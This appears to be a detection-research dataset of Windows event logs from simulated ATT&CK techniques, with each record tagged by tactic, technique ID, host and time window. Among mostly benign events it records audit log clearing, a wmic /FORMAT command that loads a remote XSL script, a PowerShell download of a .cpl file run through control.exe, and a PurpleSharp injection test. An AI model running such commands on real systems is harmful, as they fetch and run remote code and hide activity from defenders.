0x2c8 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2c8 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe
92
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Defense Evasion
T1218.004
2020-09-20T04:17:16.436000+03:00
2020-09-20T04:19:51.651000+03:00
1. An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Acco || 2. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Privileges: SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege SeDelegateSess || 3. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2b44 Process Information: Process ID: 0x2b0 Process Name: C:\Windows\System32\services.exe || 4. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0xadc Resource Attributes: - Process Information: Process ID: 0x2b0 Process Name: C:\Windows\System32\services.exe Acce || 5. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0xadc Resource Attributes: - Process Information: Process ID: 0x2b0 Process Name: C:\Windows\System32\services.exe || 6. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0xadc Process Information: Process ID: 0x2b0 Process Name: C:\Windows\System32\services.exe || 7. C:\windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x1918 Process Information: Process ID: 0x116c Process Name: C:\Windows\System32\svchost.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x8c Resource Attributes: - Process Information: Process ID: 0x116c Process Name: C:\Windows\System32\svchost.exe Access Request Information: T || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x8c Resource Attributes: - Process Information: Process ID: 0x116c Process Name: C:\Windows\System32\svchost.exe Access Request Informatio || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x8c Process Information: Process ID: 0x116c Process Name: C:\Windows\System32\svchost.exe || 12. A process has exited. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0x6a8 Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Exit Status: 0x0
93
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.theshire.local
12
Discovery
T1087.001
2020-09-22T02:27:00.772000+03:00
2020-09-22T02:27:08.327000+03:00
1. C:\windows\system32\wbem\wmiprvse.exe -secured -Embedding || 2. Win32_WIN32_TERMINALSERVICE_Prov provider started with result code 0x0. HostProcess = wmiprvse.exe; ProcessID = 380; ProviderPath = %SystemRoot%\system32\tscfgwmi.dll || 3. CIMWin32 provider started with result code 0x0. HostProcess = wmiprvse.exe; ProcessID = 380; ProviderPath = %systemroot%\system32\wbem\cimwin32.dll || 4. C:\windows\system32\wbem\wmiprvse.exe -secured -Embedding || 5. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x21e0 Process Information: Process ID: 0x17c Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x80 Resource Attributes: - Process Information: Process ID: 0x17c Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request Infor || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-20 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x80 Resource Attributes: - Process Information: Process ID: 0x17c Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Access Request I || 8. The handle to an object was closed. Subject : Security ID: S-1-5-20 Account Name: WORKSTATION6$ Account Domain: THESHIRE Logon ID: 0x3E4 Object: Object Server: Security Handle ID: 0x80 Process Information: Process ID: 0x17c Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe || 9. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x3f0c Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe || 10. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x718 Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 11. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x718 Resource Attributes: - Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe Access Request In || 12. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x718 Process Information: Process ID: 0x900 Process Name: C:\Windows\System32\svchost.exe
94
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.theshire.local
12
Lateral Movement
T1210
2020-09-17T06:39:46.651000+03:00
2020-09-17T06:41:46.543000+03:00
1. File created: RuleName: - UtcTime: 2020-09-17 03:39:43.830 ProcessGuid: {9d9bf3d6-6ccb-5f62-2500-000000000400} ProcessId: 1672 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-09-16 19:51:39.815 || 2. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x1bc4 Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x64c Resource Attributes: - Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x64c Resource Attributes: - Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe Access Request In || 5. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x64c Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe || 6. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x1ae0 Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe || 7. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x3c4 Resource Attributes: - Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 8. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x3c4 Resource Attributes: - Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe Access Request In || 9. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x3c4 Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe || 10. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x1ae0 Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe || 11. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x64c Resource Attributes: - Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 12. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x64c Resource Attributes: - Process Information: Process ID: 0x714 Process Name: C:\Windows\System32\svchost.exe Access Request In
95
OTRF-Security-Datasets-atomic
windows
WORKSTATION6.theshire.local
12
Defense Evasion
T1218
2020-10-13T01:33:09.122000+03:00
2020-10-13T01:35:16.404000+03:00
1. File created: RuleName: - UtcTime: 2020-10-12 22:33:07.099 ProcessGuid: {37c5a1b2-c0cb-5f84-1e00-000000000400} ProcessId: 1400 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-10-12 20:47:07.800 || 2. File created: RuleName: - UtcTime: 2020-10-12 22:34:07.104 ProcessGuid: {37c5a1b2-c0cb-5f84-1e00-000000000400} ProcessId: 1400 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-10-12 20:48:07.723 || 3. File created: RuleName: - UtcTime: 2020-10-12 22:35:07.105 ProcessGuid: {37c5a1b2-c0cb-5f84-1e00-000000000400} ProcessId: 1400 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-10-12 20:47:07.800 || 4. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x1d40 Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe || 5. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x7b0 Resource Attributes: - Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x7b0 Resource Attributes: - Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe Access Request In || 7. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x7b0 Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe || 8. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x1f1c Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x7e0 Resource Attributes: - Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x7e0 Resource Attributes: - Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe Access Request In || 11. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x7e0 Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Handle ID: 0x1f1c Process Information: Process ID: 0x768 Process Name: C:\Windows\System32\svchost.exe
96
OTRF-Security-Datasets-atomic
windows
MORDORDC.theshire.local
12
Discovery
T1069.001
2020-09-22T02:18:50.323000+03:00
2020-09-22T09:17:54.217000+03:00
1. Special privileges assigned to new logon. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x696B82D Privileges: SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeLoadDriverPrivilege SeImpersonatePrivilege SeDelegateSessionUserImpersonatePrivilege SeEnableDelegationPrivilege || 2. An account was successfully logged on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Information: Logon Type: 3 Restricted Admin Mode: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE.LOCAL Logon ID: 0x696B82D Linked Logon ID: 0x0 Network Account Name: || 3. An account was logged off. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x696B82D Logon Type: 3 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer. || 4. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2204 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 5. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x41c Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x41c Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 7. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x41c Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 8. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x2304 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 9. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x500 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Access R || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Handle ID: 0x500 Resource Attributes: - Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe Acce || 11. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x500 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe || 12. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: MORDORDC$ Account Domain: THESHIRE Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x22c4 Process Information: Process ID: 0x638 Process Name: C:\Windows\System32\svchost.exe
97
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Defense Evasion
T1220
2020-10-18T05:17:00.214000+03:00
2020-10-18T05:17:16.759000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0x13899EA || 2. wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" || 3. wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" || 4. RawAccessRead detected: RuleName: - UtcTime: 2020-10-18 06:17:03.258 ProcessGuid: {39e4a257-f705-5f87-0100-000000000400} ProcessId: 4 Image: System Device: \Device\HarddiskVolume3 || 5. RawAccessRead detected: RuleName: - UtcTime: 2020-10-18 06:17:03.258 ProcessGuid: {39e4a257-f705-5f87-0100-000000000400} ProcessId: 4 Image: System Device: \Device\HarddiskVolume1 || 6. RawAccessRead detected: RuleName: - UtcTime: 2020-10-18 06:17:03.258 ProcessGuid: {39e4a257-f705-5f87-0100-000000000400} ProcessId: 4 Image: System Device: \Device\HarddiskVolume2 || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0x13899EA Object: Object Server: Security Handle ID: 0x98 Process Information: Process ID: 0x428 Process Name: C:\Windows\System32\wbem\WMIC.exe || 8. An attempt was made to access an object. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0x13899EA Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x98 Resource Attributes: - Process Information: Process ID: 0x428 Process Name: C:\Windows\System3 || 9. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0x13899EA Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x98 Resource Attributes: - Process Information: Process ID: 0x428 Process Name: C:\Windows\System32\wb || 10. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0x13899EA Object: Object Server: Security Handle ID: 0x1bc8 Process Information: Process ID: 0x428 Process Name: C:\Windows\System32\wbem\WMIC.exe || 11. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0x13899EA Object: Object Server: Security Handle ID: 0x308 Process Information: Process ID: 0x428 Process Name: C:\Windows\System32\wbem\WMIC.exe || 12. An attempt was made to access an object. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0x13899EA Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment Handle ID: 0x308 Resource Attributes: - Process Information: Process ID: 0x428 Process
98
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Defense Evasion
T1218.002
2020-10-22T04:31:04.973000+03:00
2020-10-22T04:31:14.252000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0xC61D9 || 2. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x3b64 Process Information: Process ID: 0x2988 Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0xb40 Resource Attributes: - Process Information: Process ID: 0x2988 Process Name: C:\Windows\System32\Wi || 4. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0xb40 Process Information: Process ID: 0x2988 Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 5. File created: RuleName: - UtcTime: 2020-10-22 05:31:09.410 ProcessGuid: {39e4a257-1872-5f91-5c12-000000000700} ProcessId: 10632 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\ProgramData\calc.cpl CreationUtcTime: 2020-10-22 05:31:09.394 || 6. Dns query: RuleName: - UtcTime: 2020-10-22 05:31:07.998 ProcessGuid: {39e4a257-1872-5f91-5c12-000000000700} ProcessId: 10632 QueryName: github.com QueryStatus: 0 QueryResults: ::ffff:140.82.114.3; Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 7. Dns query: RuleName: - UtcTime: 2020-10-22 05:31:08.120 ProcessGuid: {39e4a257-1872-5f91-5c12-000000000700} ProcessId: 10632 QueryName: raw.githubusercontent.com QueryStatus: 0 QueryResults: type: 5 github.map.fastly.net;::ffff:151.101.208.133; Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe || 8. Network connection detected: RuleName: - UtcTime: 2020-10-22 05:31:07.989 ProcessGuid: {39e4a257-f133-5f8b-3300-000000000700} ProcessId: 1928 Image: C:\Windows\System32\svchost.exe User: NT AUTHORITY\NETWORK SERVICE Protocol: udp Initiated: true SourceIsIpv6: false SourceIp: 192.168.2.5 SourceHostname: - SourcePort: 53080 SourcePortName: - DestinationIsIpv6: false DestinationIp: 168.63.129.16 Dest || 9. Network connection detected: RuleName: - UtcTime: 2020-10-22 05:31:07.998 ProcessGuid: {39e4a257-1872-5f91-5c12-000000000700} ProcessId: 10632 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: WORKSTATION5\wardog Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 192.168.2.5 SourceHostname: - SourcePort: 51954 SourcePortName: - DestinationIsIpv6: false DestinationIp: || 10. File created: RuleName: - UtcTime: 2020-10-22 05:31:10.332 ProcessGuid: {39e4a257-f133-5f8b-1c00-000000000700} ProcessId: 1260 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-10-18 07:40:33.283 || 11. Network connection detected: RuleName: - UtcTime: 2020-10-22 05:31:08.121 ProcessGuid: {39e4a257-1872-5f91-5c12-000000000700} ProcessId: 10632 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: WORKSTATION5\wardog Protocol: tcp Initiated: true SourceIsIpv6: false SourceIp: 192.168.2.5 SourceHostname: - SourcePort: 51955 SourcePortName: - DestinationIsIpv6: false DestinationIp: || 12. "C:\windows\system32\control.exe" C:\ProgramData\calc.cpl
99
OTRF-Security-Datasets-atomic
windows
WORKSTATION5
12
Privilege Escalation
T1055.002
2020-10-23T06:12:00.928000+03:00
2020-10-23T06:12:06.477000+03:00
1. The audit log was cleared. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Domain Name: WORKSTATION5 Logon ID: 0xC61D9 || 2. The handle to an object was closed. Subject : Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: WORKGROUP Logon ID: 0x3E7 Object: Object Server: Security Handle ID: 0x4438 Process Information: Process ID: 0xd18 Process Name: C:\Windows\Sysmon.exe || 3. A handle to an object was requested. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: WORKGROUP Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SysmonDrv\Parameters Handle ID: 0x840 Resource Attributes: - Process Information: Process ID: 0xd18 Process Name: C:\Windows\Sysmon.exe Access Request I || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: WORKGROUP Logon ID: 0x3E7 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SysmonDrv\Parameters Handle ID: 0x840 Resource Attributes: - Process Information: Process ID: 0xd18 Process Name: C:\Windows\Sysmon.exe Access Reque || 5. PurpleSharp.exe /t T1055.002 || 6. PurpleSharp.exe /t T1055.002 || 7. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x4604 Process Information: Process ID: 0x230c Process Name: C:\Users\wardog\Desktop\PurpleSharp.exe || 8. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SOFTWARE\Microsoft\.NETFramework Handle ID: 0xc0 Resource Attributes: - Process Information: Process ID: 0x230c Process Name: C:\Users\wardog\Desktop || 9. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0xc0 Process Information: Process ID: 0x230c Process Name: C:\Users\wardog\Desktop\PurpleSharp.exe || 10. The handle to an object was closed. Subject : Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: Object Server: Security Handle ID: 0x4604 Process Information: Process ID: 0x230c Process Name: C:\Users\wardog\Desktop\PurpleSharp.exe || 11. A handle to an object was requested. Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Object: 